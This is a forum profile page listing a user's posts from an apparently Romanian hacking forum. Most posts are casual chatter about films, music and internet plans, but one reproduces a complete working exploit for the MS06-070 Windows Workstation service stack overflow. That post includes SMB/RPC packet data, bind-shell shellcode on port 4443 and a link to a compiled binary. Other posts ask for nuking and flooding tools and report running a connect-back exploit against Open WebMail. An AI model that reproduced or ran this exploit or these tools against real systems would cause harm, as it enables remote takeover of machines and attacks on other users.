Jump to content

Christian

Active Members
  • Posts

    90
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Christian's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. asta stiam deja...dar nu gasesc nici un nuker care sa aiba vre-un efect asupra lui..hai ca deja incepem sa devenim offtopic.
  2. dar ceva pt vypress nu aveti? nici asta nu are efect...nu am gasit prog de flood pt el
  3. Marc et Claude - Tremble (vinil club mix) & in coada de asteptare Happy Fathers - Bounce
  4. si eu am conexiune tot prin PPPoE (nu ierdeesh) cu 3 feluri de tarifare 1. Net non-stop = 10$ 2. 12 ore/zi = 7$ 3. 200 ore/luna = 7$ insa am inteles ca la a 3-a varianta exista o smecherie prin care poti sa te conectezi chiar daca ai terminat cele 200 ore ..stie cineva ceva??
  5. sincer nici tie nu ti-ar strica :@ probabil ca nu merge numai in LAN ..ip-ul caruia ii dai shutdown trebuie sa aiba portul 135 (sau 445 ..nu`s sigur) deschis..insa majoritatea providerilor blocheaza porturile astea si in cele mai multe cazuri n`o sa mearga
  6. hai ca deja incepeti sa o dati in SF ... acum incep sa inteleg de ce sunt interzise unele filme copiilor sun 12 ani oricum povestea cu virusul numit prostie e REALA !! cunosc cateva persoane infectate ..noroc ca nu e contagios
  7. ce versiune de windows este afectata ? banuiesc ca win2k am incercat peWinXp SP1 si SP2 si nu merge ..
  8. nu cred ca ar face asta ..el se straduieste sa creasca in ochii romanilor ..iti dai seama cum l-ar privi romanii daca i-ar da afara din case da` ce ... tu nu te distrezi ? parerea ta! stie el ce stie..uite ca l-a ajutat dumnezeu si azi ..a facut egal cu pandurii :@ mare noroc cu siguranta nu au lana de aur dar are el rotitzele din cap bine unse concluzia ... JIJI RULZZZZZZZ !!! :@
  9. /*************************************************************************** Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit by cocoruder(frankruder_at_hotmail.com),2006.11.15 page:[url]http://ruder.cdut.net/default.asp[/url] Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to correct jmp EBX address and fixed exploit output status. Should work on Windows 2000 Server SP4 (All Languages) usage: ms06070 targetip DomainName notice: Make sure the DomainName is valid and live,more informations see [url]http://research.eeye.com/html/advisories/published/AD20061114.html[/url], cocoruder just research the vulnerability and give the exploit for Win2000. ****************************************************************************/ #include <stdio.h> #include <windows.h> #include <winsock.h> #include <tchar.h> #pragma comment(lib, "wsock32.lib") unsigned char SmbNeg[] = "x00x00x00x2fxffx53x4dx42x72x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54" "x20x4cx4dx20x30x2ex31x32x00"; unsigned char Session_Setup_AndX_Request[]= "x00x00x00x48xffx53x4dx42x73x00" "x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff" "xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00" "x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d" "x62x00"; unsigned char TreeConnect_AndX_Request[]= "x00x00x00x58xffx53x4dx42x75x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08" "x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00" "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00" "x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f" "x3fx00"; unsigned char NTCreate_AndX_Request[]= "x00x00x00x64xffx53x4dx42xa2x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00" "x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00" "x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00" "x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00" "x77x00x6bx00x73x00x73x00x76x00x63x00x00x00"; unsigned char Rpc_Bind_Wkssvc[]= "x00x00x00x92xffx53x4dx42x25x00" "x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00" "x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00" "x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a" "x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49" "x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00" "x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00" "x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3" "xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11" "x9fxe8x08x00x2bx10x48x60x02x00x00x00"; unsigned char Rpc_NetrJoinDomain2_Header[]= "x00x00x00xa8xffx53x4dx42x25x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00" "x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54" "x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00" "x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00" "x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00" "x00x00x00x00" "x16x00" //opnum,NetrJoinDomain2 "x30x2ax42x00" "x0ex00x00x00" "x00x00x00x00" "x0ex00x00x00" "x5cx00x5cx00x31x00x37x00x32x00" "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00" "x00x00" "x10x01x00x00" "x00x00x00x00" "x10x01x00x00"; unsigned char Rpc_NetrJoinDomain2_End[]= "x00x00x00x00" "x00x00x00x00" "x00x00x00x00" "x01x00x00x00"; unsigned char *lpDomainName=NULL; DWORD dwDomainNameLen=0; /* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub [url]http://metasploit.com[/url] */ unsigned char shellcode[] = "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe9" "x59x23xcex83xebxfcxe2xf4x15x33xc8x83x01xa0xdcx31" "x16x39xa8xa2xcdx7dxa8x8bxd5xd2x5fxcbx91x58xccx45" "xa6x41xa8x91xc9x58xc8x87x62x6dxa8xcfx07x68xe3x57" "x45xddxe3xbaxeex98xe9xc3xe8x9bxc8x3axd2x0dx07xe6" "x9cxbcxa8x91xcdx58xc8xa8x62x55x68x45xb6x45x22x25" "xeax75xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45" "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57xcfx9e" "x16x8fx45x9dx8fx31x10xfcx81x2ex50xfcxb6x0dxdcx1e" "x81x92xcex32xd2x09xdcx18xb6xd0xc6xa8x68xb4x2bxcc" "xbcx33x21x31x39x31xfaxc7x1cxf4x74x31x3fx0ax70x9d" "xbax0ax60x9dxaax0axdcx1ex8fx31x32x95x8fx0axaax2f" "x7cx31x87xd4x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6" "x4dxf4x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87" "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9fx5ax99" "x16x8fx76x31x39x3fx49xaax8fx31x40xa3x60xbcx49x9e" "xb0x70xefx47x0ex33x67x47x0bx68xe3x3dx43xa7x61xe3" "x17x1bx0fx5dx64x23x1bx65x42xf2x4bxbcx17xeax35x31" "x9cx1dxdcx18xb2x0ex71x9fxb8x08x49xcfxb8x08x76x9f" "x16x89x4bx63x30x5cxedx9dx16x8fx49x31x16x6exdcx1e" "x62x0exdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91" "xbaxa6xf5x31x39x59x23xce"; DWORD fill_len_1 =0x84c; //fill data DWORD fill_len_2 =0x1000; //fill rubbish data DWORD addr_jmp_ebx=0x77F92A9B; //jmp ebx address,in ntdll.dll unsigned char code_jmp8[]= //jmp 8 "xEBx06x90x90"; unsigned char *Rpc_NetrJoinDomain2=NULL; DWORD dwRpc_NetrJoinDomain2=0; unsigned char recvbuff[2048]; void showinfo(void) { printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn"); printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n"); printf("page:http://ruder.cdut.net/default.aspnn"); printf("Code fixed by S A Stevens - 16.11.2006n"); printf("Should work on Windows 2000 Server SP4 (All Languages)nn"); printf("usage:n"); printf("ms06070 targetip DomainNamenn"); printf("notice:n"); printf("Make sure the DomainName is valid and live,more informations seen"); printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n"); printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn"); } void neg ( int s ) { char response[1024]; memset(response,0,sizeof(response)); send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0); } void MakeAttackPacket(char *lpDomainNameStr) { DWORD j,len,b_flag; dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2; lpDomainName=(unsigned char *)malloc(dwDomainNameLen); memset(lpDomainName,0,dwDomainNameLen); MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen); *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C; *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C; len=dwDomainNameLen+ //DomainName fill_len_1-3*2+ //fill_len_1 4+ //jmp 8 4+ //addr jmp ebx sizeof(shellcode)-1+ //shellcode fill_len_2+ //fill_len_2 2; //0x0000 b_flag=0; if (len%2==1) { len++; b_flag=1; } dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+ len+ sizeof(Rpc_NetrJoinDomain2_End)-1; //end //malloc Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2); if (Rpc_NetrJoinDomain2==NULL) { printf("malloc error!n"); return; } //fill nop memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2); j=sizeof(Rpc_NetrJoinDomain2_Header)-1; //update para1 length *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2; *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2; //copy header memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1); j=sizeof(Rpc_NetrJoinDomain2_Header)-1; //copy DomainName memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen); j=j+dwDomainNameLen; //calculate offset j=j+fill_len_1-3*2; //jmp 8 memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1); j=j+4; //jmp ebx address *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx; j=j+4; //copy shellcode memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1); j=j+sizeof(shellcode)-1; //fill data memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2); j=j+fill_len_2; //0x0000(NULL) if (b_flag==0) { Rpc_NetrJoinDomain2[j]=0x00; Rpc_NetrJoinDomain2[j+1]=0x00; j=j+2; } else if (b_flag==1) { Rpc_NetrJoinDomain2[j]=0x00; Rpc_NetrJoinDomain2[j+1]=0x00; Rpc_NetrJoinDomain2[j+2]=0x00; j=j+3; } //copy other parameter memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1); j=j+sizeof(Rpc_NetrJoinDomain2_End)-1; } void main(int argc,char **argv) { WSADATA ws; struct sockaddr_in server; SOCKET sock; DWORD ret; WORD userid,treeid,fid; WSAStartup(MAKEWORD(2,2),&ws); sock = socket(AF_INET,SOCK_STREAM,0); if(sock<=0) { return; } server.sin_family = AF_INET; server.sin_addr.s_addr = inet_addr(argv[1]); server.sin_port = htons((USHORT)445); printf("[+] Connecting %sn",argv[1]); ret=connect(sock,(struct sockaddr *)&server,sizeof(server)); if (ret==-1) { printf("Connection Error, Port 445 Firewalled?n"); return; } neg(sock); recv(sock,(char *)recvbuff,sizeof(recvbuff),0); ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0); if (ret<=0) { printf("send Session_Setup_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); userid=*(WORD *)(recvbuff+0x20); //get userid memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0); if (ret<=0) { printf("send TreeConnect_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); treeid=*(WORD *)(recvbuff+0x1c); //get treeid //send NTCreate_AndX_Request memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid ret=send(sock,(char *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0); if (ret<=0) { printf("send NTCreate_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); fid=*(WORD *)(recvbuff+0x2a); //get fid //rpc bind memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2); memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2); memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2); *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4); ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0); if (ret<=0) { printf("send Rpc_Bind_Wkssvc error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); MakeAttackPacket((char *)argv[2]); memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2); memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2); memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2); *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4); *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0); if (ret<=0) { printf("send Rpc_NetrJoinDomain2 error!n"); return; } printf("[+] Sent attack packet successfully, Try telnet on %s:4443?n",argv[1]); recv(sock,(char *)recvbuff,sizeof(recvbuff),0); closesocket(sock); } // milw0rm.com [2006-11-17] and the compiled version: http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar
  10. imi cer scuze ..versiunea anterioara am pierdut-o cu sursa cu tot dupa o formatare neprogramata iar versiunea asta am facut-o ulterior, in graba si probabil am gresit ceva .. o sa-mi fac timp zilele astea pt a repara eventualele greseli :@
  11. Nu e complet inizibil. Prin comanda attrib +H +S il faci Hidden si System, insa daca dai de la Folder Options > Show hidden files and folders si debifeziHide protected operating system files o sa il vezi yep` ...u`r right dar sa fim seriosi ..cati crezi ca stiu de optiunea aia ?eu unu` nu stiam
  12. ar mai fi o a 3-a varianta si anume ascunderea cu ajutorul comenzii attrib ex: dai in CMD comanda "attrib +H +S FolderName" astfel folderul o sa fie complet invizibil
  13. link nou: http://share.urbanfriends.us/savefile_php/uploads/6df49cee38.rar
  14. Chiar aveam nevoie de un exploit pt Open WebMail ... l-am testat pe Open WebMail version 1.81 si rezultatul este: [+] Listen on port: 4444 [+] Prepairing ShellCode...Done! [+] Inject Shellcode to out host...Done! [+] Chmod our ShellCode on host...Done! [+] Exec ShellCode...Done! [+] Wait for Connect-back Can't Hack User defined signal 2 any ideas ? :?
  15. 10x ppl ! majoritatea filmelor pe care le-ati mentionat nu le-am vazut asa ca am de downloadat nu gluma ..noroc cu provideru ca mi-a marit din nou viteza de download btw daca mai stie cineva nume de filme peste care merita sa tragi un ochi cred ca nu s-ar supara nimeni daca le-ati posta aici
×
×
  • Create New...